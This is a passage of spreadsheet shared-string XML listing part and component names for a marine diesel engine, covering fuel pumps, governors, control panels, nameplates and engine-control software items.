    <t>PIN GAUGE-ST.AIR DISTRIB.</t>
  </si>
  <si>
    <t>PIN GAUGE F INTERM. SHAFT</t>
  </si>
  <si>
    <t>PIN GAUGE,LUB.DRIVE</t>
  </si>
  <si>
    <t>BEARING STUD</t>
  </si>
  <si>
    <t>ROLLER CHAIN</t>
  </si>
  <si>
    <t>CONTROL DRIVE, COMPL.</t>
  </si>
  <si>
    <t>TEMPLATE-EXHAUST CAM</t>
  </si>
  <si>
    <t>BLANK-EXHAUST CAM</t>
  </si>
  <si>
    <t>CAM - HALF</t>
  </si>
  <si>
    <t>BLANK-FUEL CAM</t>
  </si>
  <si>
    <t>TEMPLATE-FUEL CAM</t>
  </si>
  <si>
    <t>TEMPLATE-INLET CAM</t>
  </si>
  <si>
    <t>BUSHING FOR FUEL CAM</t>
  </si>
  <si>
    <t>PLATE FOR BRACKET</t>
  </si>
  <si>
    <t>SUPPL. FOR CRANKCASE</t>
  </si>
  <si>
    <t>PARTS FOR PROTOTYPE</t>
  </si>
  <si>
    <t>BRACKET REMOTE THERMOM.</t>
  </si>
  <si>
    <t>LEAD-IN PLATE</t>
  </si>
  <si>
    <t>SUPPORT, LEAD-IN PLATE</t>
  </si>
  <si>
    <t>HOLES FOR THERMOFEELERS</t>
  </si>
  <si>
    <t>PLATE FOR SUPPORT</t>
  </si>
  <si>
    <t>PMI SOFTWARE</t>
  </si>
  <si>
    <t>PMI SYSTEM USERS MANUAL</t>
  </si>
  <si>
    <t>PMI INSTALL. &amp; START-UP</t>
  </si>
  <si>
    <t>CAPA PERFORMANCE SYSTEM</t>
  </si>
  <si>
    <t>PMI SCOPE OF SUPPLY</t>
  </si>
  <si>
    <t>QUICK REFERENCE MANUAL</t>
  </si>
  <si>
    <t>SHIELD, PICK-UP BOX</t>
  </si>
  <si>
    <t>BRACKET, SENSOR</t>
  </si>
  <si>
    <t>SUPPORT, SENSOR</t>
  </si>
  <si>
    <t>TRIGGER RING</t>
  </si>
  <si>
    <t>TOOL FOR TRIGGER RING</t>
  </si>
  <si>
    <t>CONNECTING PIECE, TRIGGER</t>
  </si>
  <si>
    <t>DETAIL DRWG-PRESS.GAUGE</t>
  </si>
  <si>
    <t>COCOS-SPC</t>
  </si>
  <si>
    <t>COCOS SYSTEM</t>
  </si>
  <si>
    <t>PRESSURE CONTROL</t>
  </si>
  <si>
    <t>TEST VALVE</t>
  </si>
  <si>
    <t>HIGH TENSION PART</t>
  </si>
  <si>
    <t>SPARK PLUG</t>
  </si>
  <si>
    <t>IGNITION SYSTEM COMPLETE</t>
  </si>
  <si>
    <t>MOUNT. OF TERMINAL BOX</t>
  </si>
  <si>
    <t>ENGINE CONTROL PANEL</t>
  </si>
  <si>
    <t>KEYBOARD</t>
  </si>
  <si>
    <t>MANOMETER HOLDER</t>
  </si>
  <si>
    <t>MOUNT. OF SWITCH</t>
  </si>
  <si>
    <t>MOUNT. OF CABLE TRAY</t>
  </si>
  <si>
    <t>CABLE TIE</t>
  </si>
  <si>
    <t>MOUNT. OF MONITORING BOX</t>
  </si>
  <si>
    <t>CABLE UNION</t>
  </si>
  <si>
    <t>BUS BAR</t>
  </si>
  <si>
    <t>AUXILLARY CONTACT</t>
  </si>
  <si>
    <t>GOVERNOR PANEL</t>
  </si>
  <si>
    <t>DATA LOGGER PANEL</t>
  </si>
  <si>
    <t>ANALOG CALCULATOR</t>
  </si>
  <si>
    <t>CABLE CONDUIT</t>
  </si>
  <si>
    <t>IGNITION CABLE</t>
  </si>
  <si>
    <t>IGNITION COIL</t>
  </si>
  <si>
    <t>LIST OF INSTRUMENTS</t>
  </si>
  <si>
    <t>SPARKPLUG EXTENSION</t>
  </si>
  <si>
    <t>CONTACTOR</t>
  </si>
  <si>
    <t>PUSHBOTTOM</t>
  </si>
  <si>
    <t>INDICATOR LAMP</t>
  </si>
  <si>
    <t>GLOW LAMP</t>
  </si>
  <si>
    <t>THERMOSTATE</t>
  </si>
  <si>
    <t>PROGRAMMING CHECK LIST</t>
  </si>
  <si>
    <t>ALARM PANEL</t>
  </si>
  <si>
    <t>ROCKER ARM LUB. SYSTEM</t>
  </si>
  <si>
    <t>WIRE, SINGLE CORE</t>
  </si>
  <si>
    <t>AUX. RELAY</t>
  </si>
  <si>
    <t>RELAY SOCKET</t>
  </si>
  <si>
    <t>MOTOR OPERATED POTENTIOM.</t>
  </si>
  <si>
    <t>PROCESSING INTERFACE</t>
  </si>
  <si>
    <t>ELECTRONIC PARTS</t>
  </si>
  <si>
    <t>CONDUITS PIPES</t>
  </si>
  <si>
    <t>START AND JET SYSTEM BOX</t>
  </si>
  <si>
    <t>JET SYSTEM BOX</t>
  </si>
  <si>
    <t>HOSE CONNECTION</t>
  </si>
  <si>
    <t>PROTECTIVE HOSE</t>
  </si>
  <si>
    <t>THERMAL RELAY</t>
  </si>
  <si>
    <t>SELECTOR SWITCH</t>
  </si>
  <si>
    <t>TIMER</t>
  </si>
  <si>
    <t>MOUNTING OF LEVEL SWITCH</t>
  </si>
  <si>
    <t>VALVE CONTROL BOX</t>
  </si>
  <si>
    <t>ARRANGEMENT OF BRACKET</t>
  </si>
  <si>
    <t>ARR. OF OIL MIST DETECTOR</t>
  </si>
  <si>
    <t>CAPACITOR</t>
  </si>
  <si>
    <t>PARTS FOR TERMINAL STRIP</t>
  </si>
  <si>
    <t>ARR. OF THERM-/PRESSOSTAT</t>
  </si>
  <si>
    <t>INDICATING BOX</t>
  </si>
  <si>
    <t>NEOPRENBUSH</t>
  </si>
  <si>
    <t>R/I TRANSMITTER</t>
  </si>
  <si>
    <t>LEVEL CONTROL</t>
  </si>
  <si>
    <t>ISOLATIONS AMPLIFIER</t>
  </si>
  <si>
    <t>TRANSFORMER</t>
  </si>
  <si>
    <t>PROTECTING WELL</t>
  </si>
  <si>
    <t>REMOTE CONTROL BOX</t>
  </si>
  <si>
    <t>CALIBRATION CURVE</t>
  </si>
  <si>
    <t>PRELUB. OIL PUMP STARTER</t>
  </si>
  <si>
    <t>RELAY BOX</t>
  </si>
  <si>
    <t>BY-PASS REG. CHARGE AIR</t>
  </si>
  <si>
    <t>PLATE F. MOUNT. OF T+P</t>
  </si>
  <si>
    <t>CONNECTION DIAGRAM</t>
  </si>
  <si>
    <t>NOZZLE COOL. PUMP STARTER</t>
  </si>
  <si>
    <t>INDICATING INSTRUMENT</t>
  </si>
  <si>
    <t>ROTARY SWITCH</t>
  </si>
  <si>
    <t>ARR. OF THERMOSTATE</t>
  </si>
  <si>
    <t>STAND-BY STARTER</t>
  </si>
  <si>
    <t>PICK-UP</t>
  </si>
  <si>
    <t>ACTIVATOR PIECE</t>
  </si>
  <si>
    <t>CABLE WAY</t>
  </si>
  <si>
    <t>BASE PLATE FOR SENSORS</t>
  </si>
  <si>
    <t>THERMAL SENSOR F.BEARINGS</t>
  </si>
  <si>
    <t>ENGINE AUTOMATIC</t>
  </si>
  <si>
    <t>MOUNT. OF THERMO- &amp; PRESS</t>
  </si>
  <si>
    <t>SLOW TURNING BOX</t>
  </si>
  <si>
    <t>CAM INDEX</t>
  </si>
  <si>
    <t>LIMIT SWITCH BOX</t>
  </si>
  <si>
    <t>LOAD CONTROL BOX</t>
  </si>
  <si>
    <t>MOUNTING BEARING</t>
  </si>
  <si>
    <t>ENGINE CONTROL BOX</t>
  </si>
  <si>
    <t>HEATER ELEMENT</t>
  </si>
  <si>
    <t>WATER LEAKAGE SENSOR</t>
  </si>
  <si>
    <t>WATE LEAKAGE RELAY</t>
  </si>
  <si>
    <t>T+P PANEL</t>
  </si>
  <si>
    <t>BLOW//BACK MONITOR</t>
  </si>
  <si>
    <t>WOODWARD REG. INFORMATION</t>
  </si>
  <si>
    <t>START BOX</t>
  </si>
  <si>
    <t>BOOSTER</t>
  </si>
  <si>
    <t>EL.DIAGRAM-LOAD CONTROL</t>
  </si>
  <si>
    <t>OUTLINE LOAD CONTROL</t>
  </si>
  <si>
    <t>STROKE LIMITER INFI</t>
  </si>
  <si>
    <t>FUEL PUMP HOUSING</t>
  </si>
  <si>
    <t>SLEEVE-INSIDE</t>
  </si>
  <si>
    <t>SLEEVE-HOUSING</t>
  </si>
  <si>
    <t>PLUNGER</t>
  </si>
  <si>
    <t>ADJUSTING SPINDLE</t>
  </si>
  <si>
    <t>SCALE</t>
  </si>
  <si>
    <t>REGULATING GUIDE</t>
  </si>
  <si>
    <t>PLUG FOR TOOTHED RACK</t>
  </si>
  <si>
    <t>TOOTHED BAR HEAD</t>
  </si>
  <si>
    <t>GEAR RIM</t>
  </si>
  <si>
    <t>TOOTHED BAR</t>
  </si>
  <si>
    <t>PISTON FOR STOP CYLINDER</t>
  </si>
  <si>
    <t>PLUG-PUMP BARREL</t>
  </si>
  <si>
    <t>HOUSING-NON-RETURN VALVE</t>
  </si>
  <si>
    <t>FUEL PUMP HOUSING, BLANK</t>
  </si>
  <si>
    <t>PISTON-SHOCK ABSORBER</t>
  </si>
  <si>
    <t>ST.SCREW NON-RETURN VALVE</t>
  </si>
  <si>
    <t>FLANGE-SHOCK ABSORBER</t>
  </si>
  <si>
    <t>HOUSING-SHOCK ABSORBER</t>
  </si>
  <si>
    <t>WORM</t>
  </si>
  <si>
    <t>NUT, WORM</t>
  </si>
  <si>
    <t>DIVERSE DELE (ER UDG</t>
  </si>
  <si>
    <t>CONNECTION BLOCK INFI</t>
  </si>
  <si>
    <t>SUSPENSION, AIR CYLINDER</t>
  </si>
  <si>
    <t>FORKED LEVER</t>
  </si>
  <si>
    <t>BALL RING</t>
  </si>
  <si>
    <t>TIMING GUIDE</t>
  </si>
  <si>
    <t>HOUSING F. CONTROL VALVE</t>
  </si>
  <si>
    <t>SEAT FOR CONTROL VALVE</t>
  </si>
  <si>
    <t>ACCUMULATOR PISTON</t>
  </si>
  <si>
    <t>SEAT FOR SAFETY VALVE</t>
  </si>
  <si>
    <t>HOLDER-HOUS.-SAFETY VALVE</t>
  </si>
  <si>
    <t>FUEL OUTLET FLANGE</t>
  </si>
  <si>
    <t>RESTRICTION PLUG</t>
  </si>
  <si>
    <t>FLANGE FOR ACTUATOR</t>
  </si>
  <si>
    <t>BUSHING SLOTTED</t>
  </si>
  <si>
    <t>AIR PISTON</t>
  </si>
  <si>
    <t>HOUSING PUNCTURE VALVE</t>
  </si>
  <si>
    <t>SEALING HOUSING</t>
  </si>
  <si>
    <t>HOUSING-SUCTION VALVE</t>
  </si>
  <si>
    <t>SPINDLE-SUCTION VALVE</t>
  </si>
  <si>
    <t>METAL BELLOW</t>
  </si>
  <si>
    <t>CUT-OFF VALVE</t>
  </si>
  <si>
    <t>TOOL FOR BUSHING</t>
  </si>
  <si>
    <t>SPRING, PRESSURE VALVE</t>
  </si>
  <si>
    <t>TOOLS FOR SEALING RING</t>
  </si>
  <si>
    <t>MOUNT.TOOLS F.SCRAPERRING</t>
  </si>
  <si>
    <t>EXTRACTOR FU.PUMP STU.BOX</t>
  </si>
  <si>
    <t>EXTRACTOR F.LOWER LINER</t>
  </si>
  <si>
    <t>MEAS. TOOL,FUEL.P.LEAD</t>
  </si>
  <si>
    <t>DRIFT-PUNCTURE VALVE</t>
  </si>
  <si>
    <t>DISM.TOOL-PUNCT.V. BELLOW</t>
  </si>
  <si>
    <t>GRIND.MANDR-CONTR.V.SEAT</t>
  </si>
  <si>
    <t>TIGHTN.TEMPL.,FUEL PUMP</t>
  </si>
  <si>
    <t>GRIND.MANDREL, SUCT.VALVE</t>
  </si>
  <si>
    <t>SPANNER-LIFT,ROLLER GUIDE</t>
  </si>
  <si>
    <t>MOUNT.SLEEVE-SEALING RING</t>
  </si>
  <si>
    <t>CONE, FOR SEALING RING</t>
  </si>
  <si>
    <t>PUSHING TOOL, SEALS</t>
  </si>
  <si>
    <t>COMPRESSION TOOL, SEALS</t>
  </si>
  <si>
    <t>SPACER RING,TOOL SEALINGS</t>
  </si>
  <si>
    <t>CLOSING SCREW</t>
  </si>
  <si>
    <t>CONNECTION SOCKET</t>
  </si>
  <si>
    <t>MONOBLOCKCYLINDER</t>
  </si>
  <si>
    <t>FLANGE FOR FUEL PUMP BLK</t>
  </si>
  <si>
    <t>WASHER FOR SPRING</t>
  </si>
  <si>
    <t>FUEL PUMP COMPLETE</t>
  </si>
  <si>
    <t>FLANGE FOR FUEL PUMP</t>
  </si>
  <si>
    <t>AIR DRIVEN HYDRAULIC PUMP</t>
  </si>
  <si>
    <t>FOOT PIECE</t>
  </si>
  <si>
    <t>HEX.SOCKET HEAD CAP SCREW</t>
  </si>
  <si>
    <t>DOUBLE THRUST PIN</t>
  </si>
  <si>
    <t>REGULATING VALVE</t>
  </si>
  <si>
    <t>PUMP HEAD</t>
  </si>
  <si>
    <t>PUMP HEAD COMPLETE</t>
  </si>
  <si>
    <t>SEAL RING</t>
  </si>
  <si>
    <t>CONSTANT PRESSURE VALVE</t>
  </si>
  <si>
    <t>CHECK VALVE</t>
  </si>
  <si>
    <t>CONTROL SLEEVE</t>
  </si>
  <si>
    <t>PLUNGER GUIDE</t>
  </si>
  <si>
    <t>RACK</t>
  </si>
  <si>
    <t>PACKING-FELT</t>
  </si>
  <si>
    <t>LABYRINTH RING</t>
  </si>
  <si>
    <t>ASSY OF MANOEUVR.CONSOLE</t>
  </si>
  <si>
    <t>MANOEUVRING CONSOLE</t>
  </si>
  <si>
    <t>CUT-OUT IN FRONT PLATE</t>
  </si>
  <si>
    <t>ASSY OF INSTRUMENTS</t>
  </si>
  <si>
    <t>PLATE FOR PNEUMATIC COMP.</t>
  </si>
  <si>
    <t>PLATE IN MAN.CONSOLE</t>
  </si>
  <si>
    <t>INSTRUMENTS</t>
  </si>
  <si>
    <t>RELAYS WITH ACCESSORIES</t>
  </si>
  <si>
    <t>LAMP COVER</t>
  </si>
  <si>
    <t>LAMP EXTRACTOR</t>
  </si>
  <si>
    <t>LIGHT EMITTING DIODE</t>
  </si>
  <si>
    <t>NAMEPLATE STAND-BY</t>
  </si>
  <si>
    <t>NAMEPLATE REG. HANDLE</t>
  </si>
  <si>
    <t>NAMEPLATE EMERG.RUNNING</t>
  </si>
  <si>
    <t>NAMEPLATE CONTROL AIR</t>
  </si>
  <si>
    <t>NAMEPLATE CRITICAL R/MIN</t>
  </si>
  <si>
    <t>NAMEPLATE FUEL BEFORE</t>
  </si>
  <si>
    <t>NAMEPLATE FUEL AFTER</t>
  </si>
  <si>
    <t>NAMEPLATE COOLING OIL</t>
  </si>
  <si>
    <t>NAMEPLATE SCAVENG.AIR</t>
  </si>
  <si>
    <t>NAMEPLATE SEA WATER</t>
  </si>
  <si>
    <t>NAMEPLATE L.OIL-CAMSHA.</t>
  </si>
  <si>
    <t>NAMEPLATE L.OIL-M.ENG.</t>
  </si>
  <si>
    <t>NAMEPLATE C.OIL-PISTON</t>
  </si>
  <si>
    <t>NAMEPLATE STARTING AIR</t>
  </si>
  <si>
    <t>NAMEPLATE FRESH WATER</t>
  </si>
  <si>
    <t>NAMEPLATES COMPONENTS</t>
  </si>
  <si>
    <t>NAMEPLATE L.OIL-TURBO</t>
  </si>
  <si>
    <t>NAMEPLATE MEASUR.SWITCH</t>
  </si>
  <si>
    <t>NAMEPLATE REVERS.SYST.</t>
  </si>
  <si>
    <t>NAMEPLATE S.P.VALV.OPEN</t>
  </si>
  <si>
    <t>NAMEPLATE S.P.VA.CLOSED</t>
  </si>
  <si>
    <t>NAMEPLATE PUMP 1 OR 2</t>
  </si>
  <si>
    <t>NAMEPLATE POWER SUPPLY</t>
  </si>
  <si>
    <t>NAMEPLATE TURN.G.ENGAG.</t>
  </si>
  <si>
    <t>NAMEPLATE LIGHTING</t>
  </si>
  <si>
    <t>NAMEPLATE EMERG.BATTERY</t>
  </si>
  <si>
    <t>NAMEPLATE WRONG WAY ALARM</t>
  </si>
  <si>
    <t>NAMEPLATE AUX.BLOWER</t>
  </si>
  <si>
    <t>NAMEPLATE STEERING GEAR</t>
  </si>
  <si>
    <t>NAMEPLATE HYDR.H.-CLEAR</t>
  </si>
  <si>
    <t>NAMEPLATE SHAFT BRAKE</t>
  </si>
  <si>
    <t>NAMEPLATE BRIDGE"IN"</t>
  </si>
  <si>
    <t>NAMEPLATE SHUTDOWN</t>
  </si>
  <si>
    <t>REGULATING HANDLE</t>
  </si>
  <si>
    <t>CAM</t>
  </si>
  <si>
    <t>MOUNTING PLATE</t>
  </si>
  <si>
    <t>PISTON FOR REGUL.HANDLE</t>
  </si>
  <si>
    <t>LOCK PIECE</t>
  </si>
  <si>
    <t>HANDGRIP</t>
  </si>
  <si>
    <t>FITTINGS</t>
  </si>
  <si>
    <t>INSTRUCTION PLATE DANISH</t>
  </si>
  <si>
    <t>INSTRUCTION PLATE ENGLISH</t>
  </si>
  <si>
    <t>INSTRUCTION PLATE FRENCH</t>
  </si>
  <si>
    <t>INSTRUCTION PLATE SPANISH</t>
  </si>
  <si>
    <t>INSTRUCTION PL.PORTUGUESE</t>
  </si>
  <si>
    <t>INSTRUCTION PLATE RUSSIAN</t>
  </si>
  <si>
    <t>INSTRUCTION PLATE POLISH</t>
  </si>
  <si>
    <t>INSTRUCTION PLATE ITALIAN</t>
  </si>
  <si>
    <t>INSTRUCTION PLATE GERMAN</t>
  </si>
  <si>
    <t>PLATE FOR PUMP</t>
  </si>
  <si>
    <t>PLATE FOR FLANGE PLATE</t>
  </si>
  <si>
    <t>MOUNTING OF ACTUATOR</t>
  </si>
  <si>
    <t>3 WAY BALL VALVE</t>
  </si>
  <si>
    <t>FLOWMATE ACTUA.W.MAGNET V</t>
  </si>
  <si>
    <t>PLATES FOR COMPONENTS</t>
  </si>
  <si>
    <t>BALL VALVE WITH ACTUATOR</t>
  </si>
  <si>
    <t>MOUNT. OF THERMO &amp; PRESSO</t>
  </si>
  <si>
    <t>ELECTRICAL DIAGRAM</t>
  </si>
  <si>
    <t>HFO SUPPLY PUMP</t>
  </si>
  <si>
    <t>HFO CIRCULATION PUMP</t>
  </si>
  <si>
    <t>NOZZLE COOLING PUMP</t>
  </si>
  <si>
    <t>MDO BOOSTER PUMP</t>
  </si>
  <si>
    <t>PUMP UNIT</t>
  </si>
  <si>
    <t>BY-PASS VALVE</t>
  </si>
  <si>
    <t>PUMP</t>
  </si>
  <si>
    <t>SPARE PARTS FOR IMO PUMP</t>
  </si>
  <si>
    <t>FASTEN SET DN 25</t>
  </si>
  <si>
    <t>INSTR.PLATE SERBOCROATIAN</t>
  </si>
  <si>
    <t>DOSAGE PUMP</t>
  </si>
  <si>
    <t>IFO BOOSTER PUMP</t>
  </si>
  <si>
    <t>BED FRAME</t>
  </si>
  <si>
    <t>ARR. OF COMPONENTS</t>
  </si>
  <si>
    <t>UNI-FUEL CONTROL PANEL</t>
  </si>
  <si>
    <t>MDO EMERGENCY PUMP</t>
  </si>
  <si>
    <t>THREADED SLEEVE</t>
  </si>
  <si>
    <t>MIMICDIAGRAM</t>
  </si>
  <si>
    <t>GENERAL ARRANGEMENT PUF</t>
  </si>
  <si>
    <t>VISCOSITY SENSOR</t>
  </si>
  <si>
    <t>VISCOSITY CONTROL UNIT</t>
  </si>
  <si>
    <t>OPERATION PANEL</t>
  </si>
  <si>
    <t>HFO BOOSTER PUMP</t>
  </si>
  <si>
    <t>FUEL OIL VENTING PIPE</t>
  </si>
  <si>
    <t>TELEGRAPH SPECIFICATION</t>
  </si>
  <si>
    <t>AIR PACK</t>
  </si>
  <si>
    <t>BED</t>
  </si>
  <si>
    <t>EL-DIAGRAM</t>
  </si>
  <si>
    <t>PREHEATER</t>
  </si>
  <si>
    <t>1" 3-WAY VALVE V1-V2</t>
  </si>
  <si>
    <t>GENERAL ARR. SPEC. UNIT</t>
  </si>
  <si>
    <t>FLOW METER</t>
  </si>
  <si>
    <t>FUEL OIL PIPE</t>
  </si>
  <si>
    <t>VENTING VALVE</t>
  </si>
  <si>
    <t>VENTILATOR</t>
  </si>
  <si>
    <t>REGULATING SHAFT</t>
  </si>
  <si>
    <t>PRIMARY F.O.PUMP HOUSING</t>
  </si>
  <si>
    <t>FLANGE F.PRIMARY F.O.PUMP</t>
  </si>
  <si>
    <t>SHAFT WITH GEARWHEEL</t>
  </si>
  <si>
    <t>HOUSING FOR FUEL PUMP</t>
  </si>
  <si>
    <t>ROTATING PACKING</t>
  </si>
  <si>
    <t>TOOTHED COUPLING</t>
  </si>
  <si>
    <t>FUEL OIL PUMP</t>
  </si>
  <si>
    <t>OIL SEAL RING</t>
  </si>
  <si>
    <t>SHAFT SEAL</t>
  </si>
  <si>
    <t>MOUNTING OF COVER</t>
  </si>
  <si>
    <t>BEARING-CAST</t>
  </si>
  <si>
    <t>FLANGE BEARING COMPLETE</t>
  </si>
  <si>
    <t>SPLIT COUPLING, PARTS FOR</t>
  </si>
  <si>
    <t>SPRING LEVER</t>
  </si>
  <si>
    <t>CYL.DOWEL</t>
  </si>
  <si>
    <t>MOVABLE LEVER</t>
  </si>
  <si>
    <t>CLAMPING ARM</t>
  </si>
  <si>
    <t>PULL ROD</t>
  </si>
  <si>
    <t>PULL ROD TUBE</t>
  </si>
  <si>
    <t>FORK HEAD</t>
  </si>
  <si>
    <t>PULL ROD HEADS</t>
  </si>
  <si>
    <t>PULL ROD UNION</t>
  </si>
  <si>
    <t>BYPASS SYST.INSTALL.GUIDE</t>
  </si>
  <si>
    <t>COMMISIONING GUIDE</t>
  </si>
  <si>
    <t>BYPASS SYSTEM, USER GUIDE</t>
  </si>
  <si>
    <t>BYPASS SYSTEM, PANEL</t>
  </si>
  <si>
    <t>BYPASS SYSTEM, SOFTWARE</t>
  </si>
  <si>
    <t>CYLINDER CONTROL UNIT</t>
  </si>
  <si>
    <t>ENGINE CONTROL UNIT</t>
  </si>
  <si>
    <t>INNER SENSOR ADAPTOR, PMI</t>
  </si>
  <si>
    <t>OUTER SENSOR ADAPTOR, PMI</t>
  </si>
  <si>
    <t>NUT FOR SENS.ADAPTOR, PMI</t>
  </si>
  <si>
    <t>RUBBER GASKET,TRAVEL SENS</t>
  </si>
  <si>
    <t>PLUG (SCUFFING SENSOR)</t>
  </si>
  <si>
    <t>VMON SYSTEM</t>
  </si>
  <si>
    <t>SENSOR ADAPTOR</t>
  </si>
  <si>
    <t>SEALING RING F.SENS.ADAPT</t>
  </si>
  <si>
    <t>BEARING COMPLETE</t>
  </si>
  <si>
    <t>SPRING ARM</t>
  </si>
  <si>
    <t>MAGNET VALVE REMOTE START</t>
  </si>
  <si>
    <t>UNION NUT</t>
  </si>
  <si>
    <t>LINKAGE</t>
  </si>
  <si>
    <t>PULL ROD HEAD</t>
  </si>
  <si>
    <t>STOP ARM</t>
  </si>
  <si>
    <t>GOVERNOR ARM</t>
  </si>
  <si>
    <t>PIN FOR BALL HEAD</t>
  </si>
  <si>
    <t>ARMHOLER</t>
  </si>
  <si>
    <t>PULL ROD END</t>
  </si>
  <si>
    <t>BEARING FRAME</t>
  </si>
  <si>
    <t>ANGLE PROFILE</t>
  </si>
  <si>
    <t>INDEX CAM</t>
  </si>
  <si>
    <t>FLAT STEEL BAR</t>
  </si>
  <si>
    <t>GOVERNOR ARM - BLANK</t>
  </si>
  <si>
    <t>U-PROFILE</t>
  </si>
  <si>
    <t>ACTUATOR F THROTTLE VALVE</t>
  </si>
  <si>
    <t>KLODS FOR STOPARM</t>
  </si>
  <si>
    <t>ARR.OF BOOSTER SERVOMOTOR</t>
  </si>
  <si>
    <t>BOOSTER SERVOMOTOR COMP.</t>
  </si>
  <si>
    <t>BRACKET F.BOOSTER SERVOM.</t>
  </si>
  <si>
    <t>TERMINAL LEVER</t>
  </si>
  <si>
    <t>ADAPTING PLATE</t>
  </si>
  <si>
    <t>TRAY-ASPINAL GOVERNOR</t>
  </si>
  <si>
    <t>SPRAY PLUG</t>
  </si>
  <si>
    <t>CYLINDRICAL GEAR WHEEL</t>
  </si>
  <si>
    <t>GOVERNOR CONTROL SYSTEM</t>
  </si>
  <si>
    <t>STAND. REPLACEMENT PARTS</t>
  </si>
  <si>
    <t>BEVEL GEAR WHEEL</t>
  </si>
  <si>
    <t>TOPCOVER ASSEMBLY</t>
  </si>
  <si>
    <t>LOAD CURVE FOR PROPULSION</t>
  </si>
  <si>
    <t>PIPE FOR LUB. OF GOVERNOR</t>
  </si>
  <si>
    <t>SPEED CONTROL</t>
  </si>
  <si>
    <t>SPM-A SYNCHRONIZER</t>
  </si>
  <si>
    <t>GOVERNOR</t>
  </si>
  <si>
    <t>DUAL FUEL CONTROL</t>
  </si>
  <si>
    <t>IMPULSE WHEEL</t>
  </si>
  <si>
    <t>BEVEL GEAR</t>
  </si>
  <si>
    <t>SPRAY SCREW</t>
  </si>
  <si>
    <t>OIL GAUGE</t>
  </si>
  <si>
    <t>SYNCHRONIZING MOTOR</t>
  </si>
  <si>
    <t>AIR PIPES FOR LAMBDA CYL.</t>
  </si>
  <si>
    <t>SLIDE SHOE</t>
  </si>
  <si>
    <t>SHUTDOWN SOLENOID</t>
  </si>
  <si>
    <t>PIN CONNECTOR</t>
  </si>
  <si>
    <t>SUPPRESSION DIODES</t>
  </si>
  <si>
    <t>PROGRAMMER</t>
  </si>
  <si>
    <t>GOVERNOR EGB-1 OP</t>
  </si>
  <si>
    <t>GOVERNOR PGA12</t>
  </si>
  <si>
    <t>BUTTON</t>
  </si>
  <si>
    <t>OVERSPEED STOP HOUSING</t>
  </si>
  <si>
    <t>SPING (RIGHT HAND)</t>
  </si>
  <si>
    <t>FLYWEIGHT HOUSING</t>
  </si>
  <si>
    <t>END STOP SWITCH</t>
  </si>
  <si>
    <t>MICRO SWITCH</t>
  </si>
  <si>
    <t>VALVE SUPPORT</t>
  </si>
  <si>
    <t>FLYWEIGHT</t>
  </si>
  <si>
    <t>HUB FOR BEVEL GEAR</t>
  </si>
  <si>
    <t>ME-ECS, TEST SOFTWARE</t>
  </si>
  <si>
    <t>ME-ECS, PARAMETER SET</t>
  </si>
  <si>
    <t>ME-ECS, SOFTWARE</t>
  </si>
  <si>
    <t>ME-ECS, PC OS IMAGE</t>
  </si>
  <si>
    <t>BEARING PEDESTAL</t>
  </si>
  <si>
    <t>SPRING FOR PULL ROD</t>
  </si>
  <si>
    <t>SRING FOR FUEL LIMIT CYL.</t>
  </si>
  <si>
    <t>HOUSING F.GOVERNOR DRIVE</t>
  </si>
  <si>
    <t>COMPONENTS ON ENGINE</t>
  </si>
  <si>
    <t>BOX FOR PNEUMATIC COMP.</t>
  </si>
  <si>
    <t>SHAFT FOR GEARBOX</t>
  </si>
  <si>
    <t>ARR.OF SHUTDOWN</t>
  </si>
  <si>
    <t>FLANGE BEARING HOUSE</t>
  </si>
  <si>
    <t>TERMINAL PLATE</t>
  </si>
  <si>
    <t>BRACKET FOR GOVERNOR</t>
  </si>
  <si>
    <t>PIANO WIRE</t>
  </si>
  <si>
    <t>COUNTER PLATE</t>
  </si>
  <si>
    <t>ASSY OF PRESS.CONVERTERS</t>
  </si>
  <si>
    <t>HOUSING FOR FLYWEIGHTS</t>
  </si>
  <si>
    <t>LOCAL CONTROL BOX</t>
  </si>
  <si>
    <t>DISTRIBUTING PIPE</t>
  </si>
  <si>
    <t>CYLINDER PIPE</t>
  </si>
  <si>
    <t>AIR RECEIVER</t>
  </si>
  <si>
    <t>LOCK BALL</t>
  </si>
  <si>
    <t>CONTACT ARM</t>
  </si>
  <si>
    <t>PLATE FOR PNEUMATICS</t>
  </si>
  <si>
    <t>BLOCK NUT</t>
  </si>
  <si>
    <t>CLAMPING BLOCK</t>
  </si>
  <si>
    <t>NAMEPLATES</t>
  </si>
  <si>
    <t>ANGLE LEVER</t>
  </si>
  <si>
    <t>EMERGENCY CONSOLE</t>
  </si>
  <si>
    <t>DRIVER</t>
  </si>
  <si>
    <t>LEVER COMPLETE</t>
  </si>
  <si>
    <t>ECCENTRIC</t>
  </si>
  <si>
    <t>POTENTIOMETER LOCK</t>
  </si>
  <si>
    <t>SHOCK ABSORBER</t>
  </si>
  <si>
    <t>ZENER DIODE</t>
  </si>
  <si>
    <t>KEY SWITCH</t>
  </si>
  <si>
    <t>COUPLING DISC</t>
  </si>
  <si>
    <t>VALVE PIECE</t>
  </si>
  <si>
    <t>LOCK PLATE</t>
  </si>
  <si>
    <t>HOUSE F.START.PISTON VALV</t>
  </si>
  <si>
    <t>SPRING (OUTER)</t>
  </si>
  <si>
    <t>SPRING        (INNER)</t>
  </si>
  <si>
    <t>VALVE PISTON</t>
  </si>
  <si>
    <t>SAFETY VALVE 1/4"F.PRESS.</t>
  </si>
  <si>
    <t>REDUCTION VALVE 1/4"</t>
  </si>
  <si>
    <t>HOUSING F. START. AIR SL.</t>
  </si>
  <si>
    <t>BOX FOR START. AIR SLIDE</t>
  </si>
  <si>
    <t>FITTED PIN</t>
  </si>
  <si>
    <t>SIDE MEMBER</t>
  </si>
  <si>
    <t>PRESSURE GAUGE FOR PI 23</t>
  </si>
  <si>
    <t>INDICATOR DRIVE</t>
  </si>
  <si>
    <t>BRACKET-INDICATOR DRIVE</t>
  </si>
  <si>
    <t>GUIDE PULLEY</t>
  </si>
  <si>
    <t>INDICATOR CAM</t>
  </si>
  <si>
    <t>BRACKET COMPLETE</t>
  </si>
  <si>
    <t>TEMPLATE-INDICATOR CAM</t>
  </si>
  <si>
    <t>TUBE CONDENSER-Y56</t>
  </si>
  <si>
    <t>ARR. OF INDICATOR VALVE</t>
  </si>
  <si>
    <t>SPLIT RING</t>
  </si>
  <si>
    <t>SEALING NUT</t>
  </si>
  <si>
    <t>HOUSING WITH BEARING</t>
  </si>
  <si>
    <t>CHAIN WH.F. CH. TIGHTENER</t>
  </si>
  <si>
    <t>HOUSING-TIGHTENING BOLT</t>
  </si>
  <si>
    <t>NECK NUT</t>
  </si>
  <si>
    <t>LOCKING DISC</t>
  </si>
  <si>
